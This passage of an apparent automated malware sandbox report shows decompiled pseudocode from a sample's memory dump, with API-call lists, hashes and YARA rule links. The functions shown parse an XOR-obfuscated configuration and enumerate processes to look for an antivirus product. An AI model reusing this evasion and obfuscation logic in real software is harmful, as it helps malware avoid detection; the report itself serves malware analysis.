								_t75 =  *0xa8d2dc; // 0x69b25f44
								_t51 = E00A8A7ED(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E00A81685(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E00A87095();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0xa8d2dc; // 0x69b25f44
								_t52 = E00A8A7ED(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00A81685(0, _t52) != 0) {
								_t121 =  *0xa8d364; // 0x1ae95b0
								E00A845CF(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0xa8d2dc; // 0x69b25f44
								_t53 = E00A8A7ED(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0xa8d2e0; // 0x105a5a8
								_t22 = _t54 + 0xa8e252; // 0x616d692f
								 *0xa8d30c = _t22;
								goto L60;
							} else {
								_t64 = E00A81685(0, _t53);
								 *0xa8d30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0xa8d2dc; // 0x69b25f44
										_t56 = E00A8A7ED(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0xa8d2e0; // 0x105a5a8
										_t23 = _t57 + 0xa8e79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E00A81685(0, _t56);
									}
									 *0xa8d380 = _t58;
									HeapFree( *0xa8d270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                                                                                                                                                0x00a8235b
                                                                                                                                                                                                                                0x00a8235e
                                                                                                                                                                                                                                0x00a8237e
                                                                                                                                                                                                                                0x00a8238c
                                                                                                                                                                                                                                0x00a8238c
                                                                                                                                                                                                                                0x00a82391
                                                                                                                                                                                                                                0x00a823ab
                                                                                                                                                                                                                                0x00a82613
                                                                                                                                                                                                                                0x00a8261a
                                                                                                                                                                                                                                0x00a82621
                                                                                                                                                                                                                                0x00a82621
                                                                                                                                                                                                                                0x00a823b1
                                                                                                                                                                                                                                0x00a823cd
                                                                                                                                                                                                                                0x00a82601
                                                                                                                                                                                                                                0x00a8260b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a823d3
                                                                                                                                                                                                                                0x00a823d3
                                                                                                                                                                                                                                0x00a823d8
                                                                                                                                                                                                                                0x00a823ee
                                                                                                                                                                                                                                0x00a823da
                                                                                                                                                                                                                                0x00a823da
                                                                                                                                                                                                                                0x00a823e7
                                                                                                                                                                                                                                0x00a823e7
                                                                                                                                                                                                                                0x00a823f8
                                                                                                                                                                                                                                0x00a823fa
                                                                                                                                                                                                                                0x00a82404
                                                                                                                                                                                                                                0x00a82409
                                                                                                                                                                                                                                0x00a82409
                                                                                                                                                                                                                                0x00a82404
                                                                                                                                                                                                                                0x00a82410
                                                                                                                                                                                                                                0x00a82426
                                                                                                                                                                                                                                0x00a82412
                                                                                                                                                                                                                                0x00a82412
                                                                                                                                                                                                                                0x00a8241f
                                                                                                                                                                                                                                0x00a8241f
                                                                                                                                                                                                                                0x00a8242a
                                                                                                                                                                                                                                0x00a8242c
                                                                                                                                                                                                                                0x00a82436
                                                                                                                                                                                                                                0x00a8243b
                                                                                                                                                                                                                                0x00a8243b
                                                                                                                                                                                                                                0x00a82436
                                                                                                                                                                                                                                0x00a82442
                                                                                                                                                                                                                                0x00a82458
                                                                                                                                                                                                                                0x00a82444
                                                                                                                                                                                                                                0x00a82444
                                                                                                                                                                                                                                0x00a82451
                                                                                                                                                                                                                                0x00a82451
                                                                                                                                                                                                                                0x00a8245c
                                                                                                                                                                                                                                0x00a8245e
                                                                                                                                                                                                                                0x00a82468
                                                                                                                                                                                                                                0x00a8246d
                                                                                                                                                                                                                                0x00a8246d
                                                                                                                                                                                                                                0x00a82468
                                                                                                                                                                                                                                0x00a82474
                                                                                                                                                                                                                                0x00a8248a
                                                                                                                                                                                                                                0x00a82476
                                                                                                                                                                                                                                0x00a82476
                                                                                                                                                                                                                                0x00a82483
                                                                                                                                                                                                                                0x00a82483
                                                                                                                                                                                                                                0x00a8248e
                                                                                                                                                                                                                                0x00a82490
                                                                                                                                                                                                                                0x00a8249a
                                                                                                                                                                                                                                0x00a8249f
                                                                                                                                                                                                                                0x00a8249f
                                                                                                                                                                                                                                0x00a8249a
                                                                                                                                                                                                                                0x00a824a6
                                                                                                                                                                                                                                0x00a824bc
                                                                                                                                                                                                                                0x00a824a8
                                                                                                                                                                                                                                0x00a824a8
                                                                                                                                                                                                                                0x00a824b5
                                                                                                                                                                                                                                0x00a824b5
                                                                                                                                                                                                                                0x00a824c0
                                                                                                                                                                                                                                0x00a824c2
                                                                                                                                                                                                                                0x00a824cc
                                                                                                                                                                                                                                0x00a824d1
                                                                                                                                                                                                                                0x00a824d1
                                                                                                                                                                                                                                0x00a824cc
                                                                                                                                                                                                                                0x00a824d8
                                                                                                                                                                                                                                0x00a824ee
                                                                                                                                                                                                                                0x00a824da
                                                                                                                                                                                                                                0x00a824da
                                                                                                                                                                                                                                0x00a824e7
                                                                                                                                                                                                                                0x00a824e7
                                                                                                                                                                                                                                0x00a824f2
                                                                                                                                                                                                                                0x00a82505
                                                                                                                                                                                                                                0x00a82505
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a824f4
                                                                                                                                                                                                                                0x00a824f4
                                                                                                                                                                                                                                0x00a824fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8250f
                                                                                                                                                                                                                                0x00a8250f
                                                                                                                                                                                                                                0x00a82511
                                                                                                                                                                                                                                0x00a82527
                                                                                                                                                                                                                                0x00a82513
                                                                                                                                                                                                                                0x00a82513
                                                                                                                                                                                                                                0x00a82520
                                                                                                                                                                                                                                0x00a82520
                                                                                                                                                                                                                                0x00a8252b
                                                                                                                                                                                                                                0x00a8252d
                                                                                                                                                                                                                                0x00a82530
                                                                                                                                                                                                                                0x00a82531
                                                                                                                                                                                                                                0x00a82538
                                                                                                                                                                                                                                0x00a8253a
                                                                                                                                                                                                                                0x00a8253b
                                                                                                                                                                                                                                0x00a8253b
                                                                                                                                                                                                                                0x00a82538
                                                                                                                                                                                                                                0x00a82542
                                                                                                                                                                                                                                0x00a82558
                                                                                                                                                                                                                                0x00a82544
                                                                                                                                                                                                                                0x00a82544
                                                                                                                                                                                                                                0x00a82551
                                                                                                                                                                                                                                0x00a82551
                                                                                                                                                                                                                                0x00a8255c
                                                                                                                                                                                                                                0x00a8256a
                                                                                                                                                                                                                                0x00a82574
                                                                                                                                                                                                                                0x00a82574
                                                                                                                                                                                                                                0x00a8257b
                                                                                                                                                                                                                                0x00a82591
                                                                                                                                                                                                                                0x00a8257d
                                                                                                                                                                                                                                0x00a8257d
                                                                                                                                                                                                                                0x00a8258a
                                                                                                                                                                                                                                0x00a8258a
                                                                                                                                                                                                                                0x00a82595
                                                                                                                                                                                                                                0x00a825a8
                                                                                                                                                                                                                                0x00a825a8
                                                                                                                                                                                                                                0x00a825ad
                                                                                                                                                                                                                                0x00a825b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82597
                                                                                                                                                                                                                                0x00a8259a
                                                                                                                                                                                                                                0x00a8259f
                                                                                                                                                                                                                                0x00a825a6
                                                                                                                                                                                                                                0x00a825b8
                                                                                                                                                                                                                                0x00a825ba
                                                                                                                                                                                                                                0x00a825d0
                                                                                                                                                                                                                                0x00a825bc
                                                                                                                                                                                                                                0x00a825bc
                                                                                                                                                                                                                                0x00a825c9
                                                                                                                                                                                                                                0x00a825c9
                                                                                                                                                                                                                                0x00a825d4
                                                                                                                                                                                                                                0x00a825e0
                                                                                                                                                                                                                                0x00a825e5
                                                                                                                                                                                                                                0x00a825e5
                                                                                                                                                                                                                                0x00a825d6
                                                                                                                                                                                                                                0x00a825d9
                                                                                                                                                                                                                                0x00a825d9
                                                                                                                                                                                                                                0x00a825f3
                                                                                                                                                                                                                                0x00a825f8
                                                                                                                                                                                                                                0x00a825fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a825fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a825a6
                                                                                                                                                                                                                                0x00a82595
                                                                                                                                                                                                                                0x00a824fe
                                                                                                                                                                                                                                0x00a824f2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82400
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82432
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82464
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82496
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A824C8
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A824FA
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00A85884,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008,?,00A85884), ref: 00A825F8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008,?,00A85884), ref: 00A8260B
                                                                                                                                                                                                                                  • Part of subcall function 00A81685: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,00A85884,00A825DE,00000000,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005), ref: 00A8168E
                                                                                                                                                                                                                                  • Part of subcall function 00A81685: memcpy.NTDLL(00000000,?,00000000,00000001,?,00A85884), ref: 00A816B1
                                                                                                                                                                                                                                  • Part of subcall function 00A81685: memset.NTDLL ref: 00A816C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3442150357-1536154274
                                                                                                                                                                                                                                • Opcode ID: 04556d69400d792a3dee237aa6a6f447ba51711e028766e0c8e18fc191fc5760
                                                                                                                                                                                                                                • Instruction ID: d3713cfe97829acc6891bc6fb8f1d726b8032ae0fc978087cdef2b9cb5dbb30e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04556d69400d792a3dee237aa6a6f447ba51711e028766e0c8e18fc191fc5760
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89816070A10204AFDB25FBB4DD84EBF7BF9EB48740B244926B402D7155FA39DD429B21
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D76ED, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D76ED(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E736D7808(_t34);
				 *_t60 = 0x2cc;
				_v632 = E736D7DE0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E736D7DE0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E736D7808(_t49);
				}
				return _t49;
			}


































                                                                                                                                                                                                                                0x736d76ed
                                                                                                                                                                                                                                0x736d76ed
                                                                                                                                                                                                                                0x736d76ed
                                                                                                                                                                                                                                0x736d7701
                                                                                                                                                                                                                                0x736d7703
                                                                                                                                                                                                                                0x736d7706
                                                                                                                                                                                                                                0x736d7706
                                                                                                                                                                                                                                0x736d770a
                                                                                                                                                                                                                                0x736d770f
                                                                                                                                                                                                                                0x736d7727
                                                                                                                                                                                                                                0x736d772d
                                                                                                                                                                                                                                0x736d7733
                                                                                                                                                                                                                                0x736d7739
                                                                                                                                                                                                                                0x736d773f
                                                                                                                                                                                                                                0x736d7745
                                                                                                                                                                                                                                0x736d774b
                                                                                                                                                                                                                                0x736d7752
                                                                                                                                                                                                                                0x736d7759
                                                                                                                                                                                                                                0x736d7760
                                                                                                                                                                                                                                0x736d7767
                                                                                                                                                                                                                                0x736d776e
                                                                                                                                                                                                                                0x736d7775
                                                                                                                                                                                                                                0x736d7776
                                                                                                                                                                                                                                0x736d777f
                                                                                                                                                                                                                                0x736d7785
                                                                                                                                                                                                                                0x736d7788
                                                                                                                                                                                                                                0x736d778e
                                                                                                                                                                                                                                0x736d779d
                                                                                                                                                                                                                                0x736d77a9
                                                                                                                                                                                                                                0x736d77b4
                                                                                                                                                                                                                                0x736d77bb
                                                                                                                                                                                                                                0x736d77c2
                                                                                                                                                                                                                                0x736d77cd
                                                                                                                                                                                                                                0x736d77d5
                                                                                                                                                                                                                                0x736d77de
                                                                                                                                                                                                                                0x736d77e0
                                                                                                                                                                                                                                0x736d77e3
                                                                                                                                                                                                                                0x736d77e5
                                                                                                                                                                                                                                0x736d77ef
                                                                                                                                                                                                                                0x736d77f7
                                                                                                                                                                                                                                0x736d77fd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7804
                                                                                                                                                                                                                                0x736d7807

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 736D76F9
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 736D77C5
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 736D77E5
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 736D77EF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                • Opcode ID: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction ID: ba578deb28372b94fd4a343730852cda3a5210a302ad2b2cb0f2fc68afcb84f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD3106B5D512189BDF11DFA5C989BCCBBB8BF08305F1040EAE40DAB280EB715A88DF45
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8A1D4, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A8A1D4() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xa8d2e0; // 0x105a5a8
						_t2 = _t9 + 0xa8ee3c; // 0x73617661
						_push( &_v264);
						if( *0xa8d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                                                                                                                                0x00a8a1df
                                                                                                                                                                                                                                0x00a8a1e9
                                                                                                                                                                                                                                0x00a8a1ed
                                                                                                                                                                                                                                0x00a8a1f7
                                                                                                                                                                                                                                0x00a8a228
                                                                                                                                                                                                                                0x00a8a1fe
                                                                                                                                                                                                                                0x00a8a203
                                                                                                                                                                                                                                0x00a8a210
                                                                                                                                                                                                                                0x00a8a219
                                                                                                                                                                                                                                0x00a8a230
                                                                                                                                                                                                                                0x00a8a21b
                                                                                                                                                                                                                                0x00a8a223
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a223
                                                                                                                                                                                                                                0x00a8a231
                                                                                                                                                                                                                                0x00a8a232
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a232
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8a22c
                                                                                                                                                                                                                                0x00a8a238
                                                                                                                                                                                                                                0x00a8a23d

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A8A1E4
                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00A8A1F7
                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00A8A223
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A8A232
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                • Opcode ID: 8d0454b241f3df0e08e128675ee2f0c01e497adef1ddf639a565eaf68216454d
                                                                                                                                                                                                                                • Instruction ID: f8aa8c336c47063d178fea50be9b39920f4b977260ce9c7eefbe9fa359779217
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d0454b241f3df0e08e128675ee2f0c01e497adef1ddf639a565eaf68216454d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF096315011246AE720F7659C09DEF776CEB96710F000162F956D3050FA30D94687B2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9FB8, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E736D9FB8(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x736eb004; // 0xa11be602
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E736D7808(_t41);
					_pop(_t61);
				}
				E736D7DE0(_t66,  &_v804, 0, 0x50);
				E736D7DE0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E736D7808(_t57);
				}
				return E736D6EA3(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}





































                                                                                                                                                                                                                                0x736d9fb8
                                                                                                                                                                                                                                0x736d9fb8
                                                                                                                                                                                                                                0x736d9fb8
                                                                                                                                                                                                                                0x736d9fc3
                                                                                                                                                                                                                                0x736d9fc8
                                                                                                                                                                                                                                0x736d9fca
                                                                                                                                                                                                                                0x736d9fd2
                                                                                                                                                                                                                                0x736d9fd4
                                                                                                                                                                                                                                0x736d9fd7
                                                                                                                                                                                                                                0x736d9fdc
                                                                                                                                                                                                                                0x736d9fdc
                                                                                                                                                                                                                                0x736d9fe8
                                                                                                                                                                                                                                0x736d9ffb
                                                                                                                                                                                                                                0x736da009
                                                                                                                                                                                                                                0x736da00f
                                                                                                                                                                                                                                0x736da015
                                                                                                                                                                                                                                0x736da01b
                                                                                                                                                                                                                                0x736da021
                                                                                                                                                                                                                                0x736da027
                                                                                                                                                                                                                                0x736da02d
                                                                                                                                                                                                                                0x736da033
                                                                                                                                                                                                                                0x736da039
                                                                                                                                                                                                                                0x736da03f
                                                                                                                                                                                                                                0x736da046
                                                                                                                                                                                                                                0x736da04d
                                                                                                                                                                                                                                0x736da054
                                                                                                                                                                                                                                0x736da05b
                                                                                                                                                                                                                                0x736da062
                                                                                                                                                                                                                                0x736da069
                                                                                                                                                                                                                                0x736da06a
                                                                                                                                                                                                                                0x736da073
                                                                                                                                                                                                                                0x736da079
                                                                                                                                                                                                                                0x736da07c
                                                                                                                                                                                                                                0x736da082
                                                                                                                                                                                                                                0x736da08f
                                                                                                                                                                                                                                0x736da098
                                                                                                                                                                                                                                0x736da0a1
                                                                                                                                                                                                                                0x736da0aa
                                                                                                                                                                                                                                0x736da0b8
                                                                                                                                                                                                                                0x736da0ba
                                                                                                                                                                                                                                0x736da0cf
                                                                                                                                                                                                                                0x736da0db
                                                                                                                                                                                                                                0x736da0de
                                                                                                                                                                                                                                0x736da0e3
                                                                                                                                                                                                                                0x736da0f2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 736DA0B0
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 736DA0BA
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 736DA0C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                • Opcode ID: 69453ecd512e16ba55018be91426ee17e439c5dcc7fb831cb5e60a4ebe425310
                                                                                                                                                                                                                                • Instruction ID: 13cf266ce687966d4788c3cf5a6a6c604e7efa0b2e877817838f7c65aeb298d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69453ecd512e16ba55018be91426ee17e439c5dcc7fb831cb5e60a4ebe425310
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC31E57595132C9BCF21DF25D988B8CBBB8BF08310F6041EAE40CA7290EB709B858F45
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8DCB, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D8DCB(int _a4) {
				void* _t14;

				if(E736D9F85(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E736D8E50(_t14, _a4);
				ExitProcess(_a4);
			}




                                                                                                                                                                                                                                0x736d8dd8
                                                                                                                                                                                                                                0x736d8df4
                                                                                                                                                                                                                                0x736d8df4
                                                                                                                                                                                                                                0x736d8dfd
                                                                                                                                                                                                                                0x736d8e06

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,736D8DCA,?,00000001,?,?), ref: 736D8DED
